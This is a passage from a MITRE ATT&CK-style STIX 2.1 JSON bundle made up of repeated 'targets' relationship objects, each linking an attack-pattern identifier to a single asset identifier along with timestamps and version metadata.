"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18092c04-71ca-4c7b-9dad-1ee04ed9139b", "created": "2024-07-01T10:37:15.820843", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820845", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e0a0a98-32f3-4ba6-9a69-8d96a809f0ac", "created": "2024-07-01T10:37:15.820853", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820855", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e3c08f7-9863-4030-ac6d-ebef3124e010", "created": "2024-07-01T10:37:15.820863", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820865", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--565c2061-e73c-450c-a823-280cfb0b11b2", "created": "2024-07-01T10:37:15.820873", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820875", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c820c41-1b28-47ee-9ac7-5157119412a1", "created": "2024-07-01T10:37:15.820883", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--286474e9-076f-4d80-ae34-97593bcf0bed", "created": "2024-07-01T10:37:15.820894", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820896", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--240acfcb-f76d-45d4-8a2e-9945b272ad9c", "created": "2024-07-01T10:37:15.820904", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d66d1795-3cc8-43e1-88f5-8739fc61f4b7", "created": "2024-07-01T10:37:15.820914", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820916", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9534b546-84fb-4881-96d9-1d67b9eb219a", "created": "2024-07-01T10:37:15.820924", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820926", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef19728d-6827-4c22-8380-669178ab452a", "created": "2024-07-01T10:37:15.820934", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820936", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3e1d943-9606-4a82-a82d-a38ecd013490", "created": "2024-07-01T10:37:15.820944", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820946", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc3a7439-645c-4cde-9784-4670710d2cec", "created": "2024-07-01T10:37:15.820954", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820956", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22a2bd21-6341-4583-8dc3-d5d0643b15ea", "created": "2024-07-01T10:37:15.820964", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820967", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50cdfdfc-c337-4a95-a5e4-5581208df5ec", "created": "2024-07-01T10:37:15.820975", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820977", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0b5ae8f-d1ac-426d-abb3-e056d2d18630", "created": "2024-07-01T10:37:15.820985", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820987", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcbc3d5e-9fae-4a1b-b1d6-88c7fe7753cf", "created": "2024-07-01T10:37:15.820996", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820998", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a57c4ca7-fbfb-4435-9670-137dedd51c0e", "created": "2024-07-01T10:37:15.821006", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821008", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--969021d1-2673-4768-8980-3c5750ec8f96", "created": "2024-07-01T10:37:15.821016", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821018", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14da2bca-f79c-4389-a66b-ee660e226ee3", "created": "2024-07-01T10:37:15.821026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821028", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6602307e-12a2-4248-8fba-4009f2b3ac40", "created": "2024-07-01T10:37:15.821036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cde2f4a-36d5-4b2e-890b-61c37a67817e", "created": "2024-07-01T10:37:15.821046", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821048", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3758a167-857b-4b23-887b-a826763a1d1a", "created": "2024-07-01T10:37:15.821056", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821059", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8cfc968d-29a7-4807-9e8f-07e2fcb3c950", "created": "2024-07-01T10:37:15.821073", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821076", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7161255d-5391-4760-9d20-1436d41895f9", "created": "2024-07-01T10:37:15.821084", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821086", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--942fb68d-b1e9-46ae-97d2-742f7558fae6", "created": "2024-07-01T10:37:15.821094", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821096", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61f8b56a-92a0-4255-888a-ef9183105a61", "created": "2024-07-01T10:37:15.821104", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821106", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--609d68a0-5301-4d0f-8446-f540ac825479", "created": "2024-07-01T10:37:15.821114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0963f913-583a-4b12-a9cf-b5289de38be7", "created": "2024-07-01T10:37:15.821125", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821127", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--687f50e3-d6df-4cb5-9031-d08b0a551f77", "created": "2024-07-01T10:37:15.821135", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821137", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--517101a8-b067-44db-98c4-0746fd88851a", "created": "2024-07-01T10:37:15.821145", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821147", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--534d830c-5ce2-46c1-9a44-3de747af5069", "created": "2024-07-01T10:37:15.821155", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821157", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52fabfc1-a10a-4ff5-9600-661ae39eb9a5", "created": "2024-07-01T10:37:15.821165", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821168", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aeb338cb-488c-403d-8be6-cc0728e391ee", "created": "2024-07-01T10:37:15.821175", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821178", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c0ef777-43a1-437a-8b7e-4bd42fd608bd", "created": "2024-07-01T10:37:15.821186", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821188", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5298ae43-8cd6-470b-96f9-ded19ffc16e1", "created": "2024-07-01T10:37:15.821196", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821198", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96a9a177-a79c-4463-977c-9847962b8d79", "created": "2024-07-01T10:37:15.821206", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821208", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--253a3204-aa48-4970-9a6c-99598be52748", "created": "2024-07-01T10:37:15.821216", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821218", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a60fbeb-70b8-4e8f-919c-46ff01293f53", "created": "2024-07-01T10:37:15.821226", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821228", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7bb2628-19e0-4e3f-a6fe-0747e9c8e9f9", "created": "2024-07-01T10:37:15.821236", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821238", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1268e649-10b5-4948-87f1-6418fb5e8207", "created": "2024-07-01T10:37:15.821246", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821248", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6472f68e-7725-41af-9797-4b207715129f", "created": "2024-07-01T10:37:15.821256", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821258", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", 